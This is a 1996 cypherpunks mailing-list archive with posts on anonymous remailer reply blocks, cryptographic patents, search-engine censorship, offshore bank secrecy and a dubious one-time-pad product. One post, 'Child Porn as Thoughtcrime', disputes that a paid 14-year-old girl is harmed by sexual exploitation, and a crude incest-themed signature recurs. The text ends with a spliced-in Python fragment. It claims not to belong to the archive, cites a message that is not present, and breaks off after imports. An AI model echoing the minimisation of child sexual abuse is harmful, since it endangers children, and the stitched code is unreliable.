Message retrieval could also be charged, of course. Another idea is that the sender could affix postage if they wanted their message to be appended to a full mailbox... A service like this is no different from something like pobox.com, except that this service lets you pickup your mail through e-mail instead of POP. So I don't think the operator would/should incurr any more liability for what runs through the system than pobox. andrew p.s. It would also be a cool thing, IMHO, for nym servers to bounce back an advertisement to everyone who sends mail to a nym.... A way to spread the word. From tcmay at got.net Tue Sep 10 16:21:38 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 07:21:38 +0800 Subject: Putting Pressure on Web Search Engines Message-ID: At 1:13 PM 9/10/96, Mike McNally wrote: >Declan McCullagh wrote: >> >> The revised Hatch "child porn" legislation criminalizes even >> *attempting* to download the forbidden data. > >What would it look like, exactly, when they went in to arrest the >AltaVista search engine? They won't likely go after a specific search site on child porn charges, per se, but they may try to impose restrictions on what gets indexed (ironically, given the name "The Index"). Just as spiders will avoid indexing some pages marked for "no index" (I don't recall the exact syntax), so too could they avoid indexing--and hence making available--sites which the government has declared off limits, either in the U.S. or in foreign sites. To the extent search engines are becoming the de facto entry point to the Web for many of us (maybe even most of us), controlling what they are allowed to index and then report on to customers is a powerful means of controlling speech. I have two predictions: 1. Alta Vista, Excite, etc., will offer services based on parental ratings, religious ratings, etc. Like well-known site filtering services such as SurfWatch and LolitaWatch, these services will present various indices to various customers. 
To make this clearer, imagine "Alta Vista for Kids," with only kid-friendly (TM) sites and pages indexed. 2. Various governments will try to pressure the various search engine operations to limit indexing of various sites and pages. While of course it is difficult for, say, Singapore to tell Alta Vista what to index, the Singaporans can say they'll put Alta Vista on the list of sites which cannot be accessed easily by Singaporans. Thus will pressure be applied. --Tim May -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From mix at squirrel.owl.de Tue Sep 10 16:21:51 1996 From: mix at squirrel.owl.de (Squirrel Remailer) Date: Wed, 11 Sep 1996 07:21:51 +0800 Subject: Looking for Love Message-ID: <19960910173401.22472.qmail@squirrel.owl.de> Hi, I'm Sham69, the best, most feared computer and telecom hacker in America. And I'm looking to loose my cherry! Me: 17, 5'8", brown eyes, scraggly hair, inch-thick glasses, pocket protector. 
Interests: late night romantic candle-lit pizza and coke dinners, dumpster diving by the AT&T corporate offices, making free phone calls all over the globe, collecting Kevin Mitnik memorabilia, keeping up with the adventures of those hot babes at The Spot, sleeping on the floor of a cheap Vegas motel with thirty other geeks at DefCon.

You: Sexually adventurous, unconcerned with personal hygiene, experienced at microwaving cold pizza, limited social skills, interested in the Web, knowledge of DOS batch files a plus.

Please send responses to Box 4456, enquirer at alpha.c2.org

From frantz at netcom.com Tue Sep 10 16:22:08 1996
From: frantz at netcom.com (Bill Frantz)
Date: Wed, 11 Sep 1996 07:22:08 +0800
Subject: One Time Reply Blocks (was Re: strengthening remailer protocols)
Message-ID: <199609101730.KAA22130@netcom6.netcom.com>

At 10:06 PM 9/9/96 -0700, Lance Cottrell wrote:
>At 4:19 PM -0700 9/9/96, Bill Frantz wrote:
>>To paraphrase John Von Neumann, any system which uses reply blocks is in a
>>state of sin. By this I mean that if there is a chain pointing at you, a
>>sufficiently powerful attacker can walk down that chain and find you.
>>
>>Given that, I will join the state of sin by proposing a mechanism which
>>will allow Alice to receive a reply from Bob, but change her mind at any
>>time. The basic idea is to have a one-time reply block which either Bob or
>>Alice can send to. If Alice thinks that too much time has elapsed, and
>>powerful enemies are walking down her reply block chain, she can send
>>herself a reply and break the chain. (She might send a reply thru each
>>link in the chain to break all the links.)
>
>The reason the message is not resendable is that the remailers keeps track
>of the serial number of that header. If forced, the log of serial numbers
>could be deleted, and the operator would process the message.
>
>Unless you are assuming some key archived by each remailer for the reply
>block, then I think it will be possible to repair the chain.

I was thinking of storing a reply-key in each remailer. The protocol might go something like this (straw man proposal):

(1) Alice picks n random ids (say 160 bits or so) and n random keys.

(2) Alice sends the combination to remailer[i], i=0,n-1.

(3) Alice builds a reply block which consists of the remailer return path, each element encyphered with the appropriate key and sends it to Bob.

(4) When a remailer processes a reply block element, it removes it from the reply block, looks up the id in its database, decrypts the address of the next hop, removes the database element and forwards the message.

If Alice becomes nervous, she sends n "replies" thru each remailer to cause the return path to be destroyed.

-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal | Periwinkle -- Consulting
(408)356-8506     | choice for best movie of  | 16345 Englewood Ave.
frantz at netcom.com | 1996                      | Los Gatos, CA 95032, USA

From caronni at tik.ee.ethz.ch Tue Sep 10 16:28:15 1996
From: caronni at tik.ee.ethz.ch (Germano Caronni)
Date: Wed, 11 Sep 1996 07:28:15 +0800
Subject: forward secrecy in mixmaster
In-Reply-To: <199609100232.TAA22069@infinity.c2.org>
Message-ID: <199609101929.VAA19477@kom30.ethz.ch>

Matthew Ghio wrote:
> > I agree it does not make much difference mathematically, but one DH modulus
> > always makes me uneasy. DH is still patented though. I think I will continue
> > to use RSAREF, but compose the standard so the protocol supports unlimited
> > key sizes.

Just a short note. The DH patent (#4200770), as held by Cylink expires at the 29th of april '97. Afterwards DH enters the public domain. That's a certain argument for using DH key exchange. RSA will go into the public domain somewhen in 2002, if I remember correctly.
Germano From varange at crl.com Tue Sep 10 16:30:02 1996 From: varange at crl.com (Troy Varange) Date: Wed, 11 Sep 1996 07:30:02 +0800 Subject: Can you trust your ISP? Message-ID: <199609101903.AA03845@crl5.crl.com> No. From jya at pipeline.com Tue Sep 10 16:31:16 1996 From: jya at pipeline.com (John Young) Date: Wed, 11 Sep 1996 07:31:16 +0800 Subject: PIN_hed Message-ID: <199609101731.RAA14869@pipe1.t1.usa.pipeline.com> 9-9-96. BuWi: "Pinkerton and SAIC establish alliance to offer security solutions against high-tech gangs, cybercriminals" "Pinkerton's gumshoes with SAIC's spooks represent a unique resource for clients who must hide from the USG high-value, mission-critical assets," said Denis Brown, PKT prez. Bob Beyster, SAIC czar, said, "Our ex-TLAs are available around the clock to jigger-jive clients freaked by TLA-stories of computer hackers, criminals and insiders." PKT bill-pads more than 45,000 and SAIC 22,000; both underpay perps and taxes. "NCSA: policeman on the internet beat." NCSA employs a number of ex-law enforcement officers who try to infiltrate hacker networks and solve problems before they start. "We track hackers by going underground to their sites," Tippett said. "We pretend to be their friends, but they fuck with our heads." "Hi/fn Integrates Encryption With Data Compression For Efficient, Secure Networking." MUM 1.0 provides a processor independent software implementation of industry standard DES and Triple DES data encryption, HMAC-SHA, HMAC-MD5 keyed hash functions, and LZS(r) and MPPC (Microsoft Point to Point Compression) compression for Internet, intranet and client-server networks. ----- http://jya.com/pinhed.txt (14 kb for 3) PIN_hed From gbroiles at netbox.com Tue Sep 10 16:31:17 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 11 Sep 1996 07:31:17 +0800 Subject: TWA 800 - Serious thread. Message-ID: <2.2.32.19960910190024.007245e4@pop.ricochet.net> At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: >If govt. 
protects its "sources and methods", however nefarious, to the >extent that the public is never asked to assent to these methods (even >though a few of us know about them anyway), then the public doesn't have >to become overtly cynical about what's going on. But the public *is* asked to assent to those methods - your chance to vote on them is known colloquially as "jury duty". -- Greg Broiles |"Post-rotational nystagmus was the subject of gbroiles at netbox.com |an in-court demonstration by the People http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt |Studdard." People v. Quinn 580 NYS2d 818,825. From willday at rom.oit.gatech.edu Tue Sep 10 16:38:25 1996 From: willday at rom.oit.gatech.edu (Will Day) Date: Wed, 11 Sep 1996 07:38:25 +0800 Subject: Harry Browne a cryptographer Message-ID: <199609102028.QAA13808@rom.oit.gatech.edu> -----BEGIN PGP SIGNED MESSAGE----- Here's an interesting detail from an AP story: A short time ago, at a computer terminal far, far away, Steve L. Dasbach wrote: >From: 76060.3222 at CompuServe.COM ("Steve L. Dasbach") >Date: 10 Sep 96 14:32:09 EDT >Message-Id: <57196.3235C30E at dehnbase.fidonet.org> >To: LPUS-PRES at dehnbase.fidonet.org (LP business - presidential) >Subject: APn Article on Harry Browne > > By KARIN MILLER > Associated Press Writer > FRANKLIN, Tenn. (AP) -- > Browne said he formed his attitude toward government when he entered the >U.S. Army three years after high school and became a cryptographer. The article didn't say anything more about his crypto past..
=== Will Day * * * * * * * * * * * willday at rom.oit.gatech.edu HARRY BROWNE FOR PRESIDENT http://rom.oit.gatech.edu/~willday/ http://www.HarryBrowne96.org/ OIT, Georgia Tech, Atlanta 30332-0715 * * * * * * * * * * * =-> Opinions expressed are mine alone and do not reflect OIT policy <-= From Ryan.Russell at sybase.com Tue Sep 10 16:48:50 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Wed, 11 Sep 1996 07:48:50 +0800 Subject: ALPHACIPHER - An unbreakable encryption program. Message-ID: <9609102022.AA04467@notesgw2.sybase.com> Now there's a business I'd like to get into.... reselling pseudo-random bit strings.... Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: roy @ sendai.scytale.com (Roy M. Silvernail) @ smtp Date: 09/10/96 07:14:33 AM Subject: Re: ALPHACIPHER - An unbreakable encryption program. -----BEGIN PGP SIGNED MESSAGE----- In alt.security, survival at aa.net writes: [ attribution scrambled ] >> True, but somehow I have a feeling that Alphacipher is not a one-time >> pad, and thus is breakable. > > This assumption is not true. ALPHACIPHER is, indeed, based upon an OTP. > We've solved all of the problems associated with pad creation, > distribution, packaging and many other concerns that have previously > limited the use of a cipher in this class. Their web page alludes to a OTP-like operation where you have to purchase key "refills". It doesn't say where they store the escrowed copies of the key material. > Visit our net page at http://www.aa.net/cyber-survival-hq for more > information, and read the reply in response to the unfounded attack by > Curtin, posted above.
I recommend this page, if only for the great conspiracy theory about automated telephone line scanning. - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ 0MlhN5IxIBk= =y4kc -----END PGP SIGNATURE----- From frantz at netcom.com Tue Sep 10 16:53:45 1996 From: frantz at netcom.com (Bill Frantz) Date: Wed, 11 Sep 1996 07:53:45 +0800 Subject: forward secrecy in mixmaster Message-ID: <199609102058.NAA12310@netcom7.netcom.com> At 9:29 PM 9/10/96 +0200, Germano Caronni wrote: >Just a short note. The DH patent (#4200770), as held by Cylink expires at >the 29th of april '97. Afterwards DH enters the public domain. That's a >certain argument for using DH key exchange. RSA will go into the public >domain somewhen in 2002, if I remember correctly. The US patent for RSA expires September 20, 2000 according to Applied Cryptography Second Edition, p474. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From tcmay at got.net Tue Sep 10 16:57:27 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 07:57:27 +0800 Subject: Child Porn as Thoughtcrime Message-ID: Q: Is a drawing of a child engaging in a sexual act an illegal item? Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old illegal? Q: Is writing a story about a child having sex illegal? Q: Is a collage of images of little girls (or boys, one presumes) in swimsuits, with apparent salacious intent, illegal? 
Q: Is accessing a Web site having nude or sexually-related images of children who are of legal sexual age in the site's country--but not in the accessor's country--illegal? Q: Is it legal to have photographs of one's own children in a nude state? (E.g., playing in a backyard pool, at the beach, etc.) Does it become illegal to let others see these photographs? How about putting them on a Web site? Q: Is a crime committed if a teenaged girls takes a photograph of _herself_ and shows it to others? To adults? Or if she writes a salacious story about herself or her friends? Or if she just invents it all? Whom is exploiting whom? Which acts are crimes? I submit that the various child porn laws we have in the United States are about the clearest examples of "thoughtcrime" one can find, where the _thought_ is what is being criminalized. First, a caveat, which ought to be clear, but which is necessary to state anyway (never know what search engines will find my words and take them out of context). I have no unusual interest in little children. Surely some teen girls can be sexually attractive, even if technically underage. Nothing surprising in this, surely? But, no, I am not an advocate of "child porn," merely wondering about the many constitutional and moral issues involved in the panoply of laws and precedents involved. Anyway, we have on this list various comments about "child porn" and why it should be illegal: -- consumption of child porn "creates a market" -- it harms the children -- it's disgusting -- etc. Clearly the first argument applies to many other things. Why not outlaw pro-drug speech? Pro-drug speech "creates a market" for an illegal product. Shut down "High Times," seize copies of books by Aldous Huxley and William Burroughs, ban mocking comments about the War on Some Drugs. The second argument, that children are actually harmed, is vitiated by the fact that much so-called child porn comes from countries where the actors are of legal age. 
How can a 14-year-old Thai girl be "harmed" when what she is being paid to do is perfectly legal in Thailand? (It's parallel to the situation with, say, Arab countries. Porn videos in Saudi Arabia are of course illegal, with roughly the status of child porn videos in the U.S. (maybe worse, as I'm sure the punishment could be death). Are the American and European actresses in such videos being harmed?) And the case of morphings, drawings, stories, etc., clearly involve no actual children, so the argument that children are harmed is empty. (Catherine MacKinnon and Andrea Dworkin, amongst others, have argued that "women as a class" are injured by pornography. I won't get into the issues of this here. Suffice it to say that if speech or nonviolent acts begin to be suppressed on the basis of "class action" cases, we're in a heap of trouble.) As to me argument that the images, stories, etc., are disgusting, amoral, inappropriate, etc., well, perhaps. But what is the legal and constitutional basis for restricting such things? Many opinions and actions are vile and disgusting, but are not illegal. Under what interpretation of the Constitution is the creation of a drawing depicting, say, a 7-year-old girl having sex with someone or something a criminal act? The obscenity laws? (And as to the obscenity laws, which part of "Congress shall make no law" did the readers of the First Amendment miss? I realize this is a longstanding topic of discussion, with various famous cases (Miller, Hustler, etc.), but it remains a mystery to me.) My point is this: For anyone who claims that "thoughtcrime" is something the Evil Empire specialized in, i.e., totalitarian communist regimes, look to the enforcement of laws about what can be viewed or accessed from the United States. Thougtcrime. --Tim May -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. 
Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From jya at pipeline.com Tue Sep 10 18:17:29 1996 From: jya at pipeline.com (John Young) Date: Wed, 11 Sep 1996 09:17:29 +0800 Subject: QDY_nam Message-ID: <199609101618.QAA19360@pipe1.t2.usa.pipeline.com> Science, 30 August 1996: "Enforcing Coherent Evolution in Dissipative Quantum Dynamics" Cirac, Pellizzari, Zoller [Precis] The major obstacle to the preparation and manipulation of many-particle entangled states is decoherence due to the coupling of the system to the environment. A scheme to correct for the effects of decoherence and enforce coherent evolution in the system dynamics is described and illustrated for the particular case of the ion-trap quantum computer. The preparation and manipulation of N-particle entangled states is fundamental to the investigation of basic aspects of quantum mechanics and is the basis of applications such as quantum computation, teleportation, cryptography. and spectroscopy. The error correction schemes proposed so far have focused on preserving a given entangled state (memory errors). We introduce a method to correct for the effects of decoherence in the dynamical proccss of preparation and modification of entangled states (gate errors). 
We illustrate our scheme in the context of the ion-trap QC. ----- This 4-page paper is packed with equations. We will scan to JPEG for those without access to Science. Send us a blank message with the subject: QDY_nam We have to enlarge the fine-print originals to make readable images, usually in the 150kb range. Does anyone know of a program to do text and equations for easy-reading, easy access to a Web site? From bshantz at nwlink.com Tue Sep 10 18:42:38 1996 From: bshantz at nwlink.com (Brad Shantz) Date: Wed, 11 Sep 1996 09:42:38 +0800 Subject: Allo allo Message-ID: <199609102243.PAA28093@montana.nwlink.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Date: Tue Sep 10 15:46:47 1996 Si_Druid wrote: >in the day' i used to write some low level crypts that were relatively > impossible to break... > they were also impossible to decrypt, which meant that the only way to > use them was to work forward.... Hmmmm. "relatively impossible" I feel so secure. > mostly i did password encryption schemes, this one working the best: I'm still partial to a one way hash. Brad From blancw at microsoft.com Tue Sep 10 19:16:06 1996 From: blancw at microsoft.com (Blanc Weber) Date: Wed, 11 Sep 1996 10:16:06 +0800 Subject: Child Porn as Thoughtcrime Message-ID: >From: tcmay at got.net > >My point is this: For anyone who claims that "thoughtcrime" is something >the Evil Empire specialized in, i.e., totalitarian communist regimes, look >to the enforcement of laws about what can be viewed or accessed from the >United States. Thoughtcrime. >.........................................................................
> > >Those laws obviously (to me) don't have all that much to do with legality nor >all that much with thought, either; but more with a government aiming to >"looking good" in front of an audience of voters, presenting an image of >being more moral, or "better-than-thou" - in front of other nations, etc.; >that is, to gain favor, and therefore political support, from the Citizen >Units by sounding like Mother Superior/fatherly figures who are going to look >after All The Little Children (tm), plus all the similarly weak & >dispossessed. > >This posturing gives all the un-selfconfident people someone to look up to, >even if they don't really get anything (their memories being too short to >notice the failed promises, lack of follow-through, and blatant >inconsistencies, not to mention the 'legal' crimes committed along the way). > >Many people seek after sympathy towards their feelings (present and/or future >pain) more than to be respected for the ability to think. I imagine this >develops into a reduced sympathy towards certain kinds of thought or towards >thinking per se, eventually, promoting a general atmosphere of tolerance for >offenses like "thoughtcrimes". > >And of course anyone who is free to think about anything & everything (who >could therefore potentially think about what everybody else has forgotten) >will seem dangerous to those who wish to appear to be in total, beneficent >control. > > .. >Blanc From declan at well.com Tue Sep 10 19:27:07 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 11 Sep 1996 10:27:07 +0800 Subject: China joins Singapore, Germany, .... Message-ID: I respectfully disagree. I spend most of my time going through sites like cnn.com, hotwired.com, news.com, altavista.digital.com, yahoo.com, lycos.com, hotbot.com, eff.org, well.com, mit.edu, whitehouse.gov, and so on. Search engines and directories, in particular, are good chokepoints to block. 
Blocking 100 sites would certainly be significant to me -- as long as they're the right ones. Before the technical fixes, that is. -Declan Duncan writes: >You must admit >that a ban on 100 sites out of all the sites in the world is pretty >insignificant. The swamping effects of thousands and soon millions of sites >means the governments of the world won't even be able to evaluate a >significant percentage even if they want to. And all this *before* we apply >any of our technical fixes. > >DCF From vznuri at netcom.com Tue Sep 10 19:29:54 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 11 Sep 1996 10:29:54 +0800 Subject: O'Reilly supports secure web server standards Message-ID: <199609102320.QAA22357@netcom7.netcom.com> ------- Forwarded Message Date: Mon, 9 Sep 1996 18:47:29 -0700 From: Ellen Elias Subject: WebSite Professional Adds Digital Signature Technology For Release September 10, 1996 Ellen Elias (707)829-0515 ext. 322 elias at ora.com http://software.ora.com/ O'REILLY'S WEBSITE PROFESSIONAL ADDS SECURITY CAPABILITIES WITH TERISA'S NEW DIGITAL SIGNATURE TECHNOLOGY Sebastopol, CA--O'Reilly & Associates announced today that its WebSite Professional(TM) product will support Terisa Systems SecureWeb Documents(TM) (SWD) client. Terisa's software is provided as a browser plug-in that works with WebSite Professional's enhanced server security capabilities. Terisa Systems SecureWeb Documents client, a pioneering technology that enables Netscape browser users to send and receive verifiable Internet documents, is currently in beta and due to ship Q496. These documents are managed and stored on an enhanced security server such as WebSite Professional. SWD, which plugs into the Netscape browser, is based on the Secure HTTP (S-HTTP) cryptographic protocol standard, developed by Terisa Systems. WebSite Professional's built-in S-HTTP support on the server side works hand-in-glove with the SWD tool on the browser side. 
Together, they enable a Web administrator to provide Web documents which are safer than paper: readable only by specified users, from the right source, and exactly as provided. SecureWeb Documents enables a Web administrator to determine the exact visitors to a given site, with the visitors' permission. WebSite Professional is the first and only server currently supporting Terisa's standards-based digital signature technology for the World Wide Web. It is also one of the only leading servers to have built-in S-HTTP security. In contrast with SSL, which establishes security at the connection level, S-HTTP establishes security at the document level. S-HTTP provides a range of security options for documents, from digital signatures, as in SWD, to encryption. "SecureWeb Document and WebSite Professional together make electronic commerce, as well as general document serving, much more secure for Web server users and their site visitors," says Gina Blaber, Director of Software Products at O'Reilly. "Our long history with Terisa Systems underscores our mutual commitment to pushing the Web's capabilities forward. SWD and WebSite Professional are among the very few Web products that support S-HTTP, an important technology which greatly increases security standards on the Web." In July, 1996, the Forrester report on Web Security stated: "In the on-line world there is no sure way to know who is on the other end of the network. In the physical world, consumers use identification cards to prove their identity. There are two critical pieces of technology that solve this problem in the on-line world: 1) Digital Certificates and 2) Digital Signatures." WebSite Professional and Terisa's SWD combine to offer this critical technology in an affordable, useable package on the Windows platform. About WebSite Professional WebSite Professional, the second generation of the award-winning server software WebSite, runs on Windows NT and 95. 
Its ease of use, documentation, and features have been widely praised. In addition to cryptographic security, WebSite Pro includes support for a wide range of programming applications, Open Data Base Connectivity (ODBC)/SQL integration through Cold Fusion Standard, a server-side Java programming environment, three comprehensive books, and four software development kits. WebSite Professional also includes all the features of its predecessor WebSite 1.1, including the HotDog Standard HTML editor, WebView graphical document and link viewer, and the Mosaic browser. Both are products of O'Reilly & Associates, developed in cooperation with independent developer Robert Denny and Enterprise Integration Technologies (EIT), Inc./Verifone. WebSite Professional's list price is $499, with upgrade pricing for WebSite 1.1 customers available from O'Reilly for $99. O'Reilly Software Online (http://software.ora.com/) contains more information about WebSite Professional, as well as O'Reilly's other software products. About O'Reilly & Associates O'Reilly & Associates is recognized worldwide for its definitive books on the Internet and UNIX, and for its development of online content and software. O'Reilly developed the Global Network Navigator (GNN), a pioneering web-based publication which it sold to America Online in June, 1995. In addition to WebSite Professional and WebSite, the company's other software products include WebBoard, a web-based multi-threaded conferencing system, PolyForm, a web forms construction kit, and Statisphere, a web traffic analyzer (to be released this fall). About Terisa Systems Terisa Systems, Inc., based in Los Altos, Calif., was formed in 1995 to provide unified communications security solutions for the WWW. In early 1995, leading industry players such as America Online, CompuServe, IBM/Prodigy, Netscape, RSA and VeriFone/EIT forged a common commitment to WWW security by agreeing to pool both investment and technology in Terisa Systems. 
Terisa Systems' mission is to create tools and applications technologies that make secure Internet commerce possible. Terisa Systems' customers and partners are WWW-based application developers and vendors of commercial online services such as AOL, CompuServe/SPRY, Novell, OpenMarket, O'Reilly & Associates, and Process Software. The company is privately held. For more information on Terisa Systems, visit http://www.terisa.com. WebSite Professional, WebSite, WebBoard, PolyForm, and Statisphere are trademarks of O'Reilly & Associates, Inc. All other names are registered trademarks or trademarks of their respective companies. ### - ------- End of Forwarded Message ------- End of Forwarded Message From gbroiles at netbox.com Tue Sep 10 20:01:49 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 11 Sep 1996 11:01:49 +0800 Subject: shutting down anon.funet.fi -- tough case Message-ID: <2.2.32.19960911000616.00711a9c@pop.ricochet.net> At 05:22 PM 9/10/96 -0500, gene o'regon wrote: > the forced closing of the anonymous remailer from finland shows how >the law has to adapt to the internet. aside from the witch-hunt aspects of >the case ["they are the biggest porno distributor, etc."], there is real >substance to the claim that you can't just ignore blatant violations of >copyright law. As I understand the situation, penet.fi wasn't forced to close but will apparently be forced (again) to compromise the anonymity of one of its users - and the operator, Johan Helsingus, chose to stop providing the service because he isn't able to protect the privacy of the users. It also might be confusing to think about anon.penet.fi as a single "case", since it's been the subject of frustration/attention from several directions - the church of scientology, the government of Singapore, and the recent UK newspaper article identifying it as a source of child porn.
Further, I don't think there's been a real claim that penet or its operator(s) have violated any copyright at all; merely that they have frustrated the efforts of copyright holders to identify alleged infringers. I don't see how any service provider of even modest size can fail to "ignore blatant violations of copyright law" given the difficulty of figuring out who's got a right to make which data available. Even a relatively easy-to-spot infringement (say, an image with "Playmate of the Month" text visible) requires that some person who's familiar with Playboy view the image and come to the conclusion that an individual user probably doesn't have the right to make images available which were apparently produced by a well-known international publishing operation. The creation of a prescreening system would require the development of protocols/systems which do not now exist, as well as burden the ability of users to communicate quickly. It's also expensive in terms of human time required, and likely to fall far short of its mission - e.g., people can perhaps spot Playboy centerfold images by their vertical-to-horizontal size ratio (I mean the image, not the model) plus the "Playmate of the month" text, and they can probably spot popular songs or images .. but matching two images or arbitrary selections of text is a difficult problem. Prescreening seems to require access (on the part of the screener) to a database of already copyrighted works, or a database of hashes (think of a hash as a digital fingerprint) of copyrighted works. The most likely scenario I can see would be for the Library of Congress (and equivalent foreign institutions) to maintain a database of all copyright works (yow!) in electronic format; and then to compare hashes of the work being screened to those works in the database. Obviously, such an effort - especially one which could respond in close-to-realtime - would be *incredibly expensive*.
(The side effect - that we'd end up with an electronic version of every copyrighted work in the Library of Congress - is alluring. But if we had that the obvious step would be to make it Web-accessible, which would so radically transform the publishing business that copyright infringement wouldn't even be interesting any more.) Keeping a database of hashes online instead of a database of works is less useful because many of the hashes must be recomputed dynamically - e.g., such a system should be able to spot substrings or resizings of copyrighted works. And all of this ignores the possibility of fair use. So I guess my point is that the problem of "acting responsible with respect to letting others post copyright-protected works without permission" is a lot harder than it sounds like it ought to be. Good faith on the part of the ISP/remailer isn't even close to good enough. -- Greg Broiles |"Post-rotational nystagmus was the subject of gbroiles at netbox.com |an in-court demonstration by the People http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt |Studdard." People v. Quinn 580 NYS2d 818,825. From declan at well.com Tue Sep 10 20:18:23 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 11 Sep 1996 11:18:23 +0800 Subject: Crypto-plutocracy: Cypherpunks mentioned on cover of Oct Wired Message-ID: Splashed on the cover: "He was the most powerful banker in the world. "So why is he talking like a cypherpunk? "Walter Wriston, on the future of money. The Wired Interview. Inside: "An amazingly frank Wired Interview with Walter Wriston about money, the economy, and the state in the Digital Era. By Thomas A. Bass." Wriston is the former chair and CEO of Citicorp/Citibank. Good interview. Though he does equate crypto nonproliferation treaty to "like a nonproliferation treaty for atomic weapons" where "an international agency" could hold the keys. But it's not an important point to him, really.
He's more interested in making money than talking politics. I call it crypto-plutocracy. -Declan PS: Check out my cyber-rights report card on Clinton v. Dole, page 95. Co-written with Brock. From chet at uconect.net Tue Sep 10 20:25:11 1996 From: chet at uconect.net (Chester Lee) Date: Wed, 11 Sep 1996 11:25:11 +0800 Subject: No Subject Message-ID: <199609101952.PAA00940@sun1.uconect.net> From blancw at microsoft.com Tue Sep 10 20:46:24 1996 From: blancw at microsoft.com (Blanc Weber) Date: Wed, 11 Sep 1996 11:46:24 +0800 Subject: PIN_hed Message-ID: >From: jya at pipeline.com [SMTP:jya at pipeline.com] > NCSA employs a number of ex-law enforcement officers who try to infiltrate hacker networks and solve problems before they start. "We track hackers by going underground to their sites," Tippett said. "We pretend to be their friends, but they fuck with our heads." .................................................................. Juno.com? .. >Blanc > > > > > > From frissell at panix.com Tue Sep 10 20:52:41 1996 From: frissell at panix.com (Duncan Frissell) Date: Wed, 11 Sep 1996 11:52:41 +0800 Subject: Ban CU Secrecy, Keep TLA's! Message-ID: <2.2.32.19960911011744.00eb4a98@panix.com> At 04:26 PM 9/10/96 GMT, John Young wrote: > Mr David Bickford, the first British intelligence lawyer > to speak publicly in the UK, said at a conference in > Cambridge, 50 miles north-east of London, that there > "appears to be no justification at all for offshore bank > secrecy other than to protect the criminal". Keeping a client's secrets happens to be an ethical and legal requirement of the legal profession. It used also to be a requirement of the medical and banking professions. If it is good for lawyers to keep secrets why not doctors and banks? > Mr Bickford, who now runs an international legal > consultancy, said "endemic corruption" is caused by > offshore secrecy, and it is "difficult to see why it is > tolerated by any other than those with an unlawful > disposition". 
So we can retain the ability to say 'fuck you Jack' to fascist bastards such as yourself. > Mr Bickford added that the "justification is put forward > at all is an example of the overwhelming subversive > corruptive influence of organised crime which has managed > to magic a seemingly acceptable position out of the sheer > weight of its financial proceeds from narcotics, fraud, > extortion and other criminal enterprise". The definition of a totalitarian is one who wants total involvement in and control of the lives of those he rules. We're just trying to keep you and all the world's rulers from becoming totalitarians. Quite a public service. Our fathers used heavy artillery and bombers rather than offshore bank secrecy to discourage totalitarianism. Pretty mild of us. > Mr Raymond Kendall, secretary general of Interpol told > the 14th International Symposium on Economic Crime that > governments should commit more resources and step up > co-operation to tackle the growing problem of > international corruption. Economic crime = thought crime. DCF From remailer at cypherpunks.ca Tue Sep 10 21:01:51 1996 From: remailer at cypherpunks.ca (John Anonymous MacDonald) Date: Wed, 11 Sep 1996 12:01:51 +0800 Subject: LEOs running anon servers? In-Reply-To: Message-ID: <199609110102.SAA26681@abraham.cs.berkeley.edu> >> There >> are a number of anonymous remailers out in cyberspace, but it has been >> stated by a knowledgeable source that a number of them are being operated >> by law enforcement agencies (presumably to troll for criminal activity). A > > >Can someone verify/discredit/comment on this statement? Who is the >knowledgeable source? Sounds like you're the one trolling. 
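The straw-man one-time reply block protocol from Bill Frantz's "forward secrecy in mixmaster" message earlier in this archive (quoted again in Lance Cottrell's reply further down), as an added sketch that is not part of any post here. The element layout (id in the clear plus a sealed next-hop address), the SHAKE-256/HMAC stand-in cipher, all class and function names, and the .invalid addresses are assumptions; the proposal itself specifies none of them.

```python
import hashlib
import hmac
import secrets


class ReplyBlockError(Exception):
    """A reply-block element could not be processed."""


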